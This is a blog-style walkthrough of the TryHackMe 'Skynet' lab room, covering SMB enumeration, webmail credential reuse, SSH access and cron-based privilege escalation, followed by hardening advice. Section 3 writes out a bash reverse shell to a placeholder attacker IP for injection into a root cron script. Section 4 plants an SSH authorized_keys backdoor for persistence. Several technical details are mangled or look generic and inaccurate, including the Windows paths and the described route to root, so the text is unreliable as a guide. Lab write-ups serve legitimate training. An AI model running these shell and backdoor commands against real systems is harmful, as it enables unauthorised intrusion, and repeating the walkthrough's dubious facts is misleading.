TryHackMe Skynet: Own the Terminator-Themed Linux VM with Samba Exploits & Cron Privilege Escalation + Video

Listen to this Post

Featured Image

Introduction:

The Skynet room on TryHackMe simulates a vulnerable Linux machine inspired by the Terminator franchise, challenging users to apply real-world enumeration, exploitation, and post-exploitation techniques. This hands-on lab focuses on Samba misconfigurations, web application flaws, and cron-based privilege escalation—core skills for any aspiring penetration tester or red teamer.

Learning Objectives:

  • Enumerate open ports and services (SMB, HTTP, SSH) using Nmap and smbclient.
  • Exploit anonymous Samba shares to retrieve sensitive credentials and gain initial access.
  • Escalate privileges via a writable cron script that runs as root.

You Should Know:

  1. Reconnaissance & SMB Enumeration – Finding the Hidden Share

Start by scanning the target machine (e.g., 10.10.10.10). Skynet typically exposes ports 22 (SSH), 80 (HTTP), 139/445 (SMB). Use Nmap for a comprehensive scan:

nmap -sC -sV -p- 10.10.10.10 -oN skynet_scan.txt

Then enumerate SMB shares anonymously:

smbclient -L //10.10.10.10 -N

If you see a share like `anonymous` or samba, connect to it:

smbclient //10.10.10.10/anonymous -N

List files – often a `notes.txt` or `log.txt` containing usernames or passwords. Download everything:

smb: > mask ""
smb: > recurse ON
smb: > prompt OFF
smb: > mget 

Windows alternative using `net view` and mounting:

net view \10.10.10.10
net use Z: \10.10.10.10\anonymous
  1. Web Application Exploitation – SquirrelMail & Credential Reuse

After SMB enumeration, visit port 80. Skynet often runs a default webpage with a hidden directory `/squirrelmail/` (a webmail client). Use `gobuster` or dirb:

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

Once you find /squirrelmail, look for credentials discovered earlier (e.g., from notes.txt). Login with those credentials – they often belong to a user like milesdyson. Inside SquirrelMail, search for emails containing passwords or hints for SSH access.

Example credential reuse:

  • Username: `milesdyson`
    – Password: `youfoundthepassword`

Then SSH into the box:

ssh [email protected]

3. Privilege Escalation via Cron Job Manipulation

Once on the machine as a low-privilege user, check for cron jobs:

cat /etc/crontab

Look for a script running as root every minute, e.g., /home/milesdyson/backup.sh. If the script is writable by your user, you can inject a reverse shell.

Step‑by‑step guide:

1. Verify write permissions: `ls -la /home/milesdyson/backup.sh`

2. Edit the script: `nano /home/milesdyson/backup.sh`

  1. Append a reverse shell one-liner (example using bash):
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
  1. Set up a netcat listener on your attack machine:
nc -lvnp 4444
  1. Wait for the cron to execute – you’ll get a root shell.

Alternative escalation: If sudo is misconfigured, run `sudo -l` to see allowed commands. Skynet sometimes allows `sudo /bin/less` or `sudo /bin/journalctl` – both can spawn a root shell via !sh.

4. Post-Exploitation & Persistence

After gaining root, capture flags and establish persistence. For Linux:

cat /root/root.txt
cat /home/milesdyson/user.txt

Install a simple backdoor via SSH key:

echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys

On Windows (if the lab had Windows), you’d use `reg add` or scheduled tasks – but Skynet is pure Linux.

5. Mitigation & Hardening Recommendations

To prevent attacks like Skynet:

  • Disable anonymous SMB access: set `map to guest = Never` in /etc/samba/smb.conf.
  • Use strong credentials and rotate them regularly.
  • Restrict cron script write permissions: `chmod 750 /home/user/backup.sh` and set owner to root.
  • Implement file integrity monitoring (AIDE, Tripwire) for critical scripts.

Linux command to secure cron scripts:

chown root:root /path/to/script.sh
chmod 755 /path/to/script.sh

Windows equivalent (for scheduled tasks):

icacls C:\Scripts\task.ps1 /inheritance:r /grant:r SYSTEM:F

6. Automating Enumeration with Tools

Use `enum4linux` for deeper SMB enumeration:

enum4linux -a 10.10.10.10

For privilege escalation, run `linpeas.sh` (transfer to target):

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

What Undercode Say:

  • Key Takeaway 1: Anonymous SMB shares remain a common entry point – always check `null session` access during internal penetration tests.
  • Key Takeaway 2: Cron jobs with world‑writable scripts are a silent but deadly privilege escalation vector; audit them regularly.

The Skynet room brilliantly mirrors real‑world misconfigurations: one weak share leads to credentials, then webmail, then SSH, and finally root via a forgotten backup script. This chain highlights why layered security (no anonymous access, principle of least privilege for cron, and regular patching) is essential. Attackers only need one flaw; defenders must block them all.

Prediction:

As AI-driven attack tools automate enumeration (e.g., using LLMs to parse `smbclient` output or `linpeas` results), rooms like Skynet will become baseline training for blue teams. Expect more labs to incorporate AI-generated misconfigurations (e.g., dynamic cron scripts) to simulate adaptive adversaries. Meanwhile, defenders will increasingly adopt infrastructure-as-code scanners (Checkov, tfsec) to detect SMB and cron issues before deployment.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Tobias Arevalo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky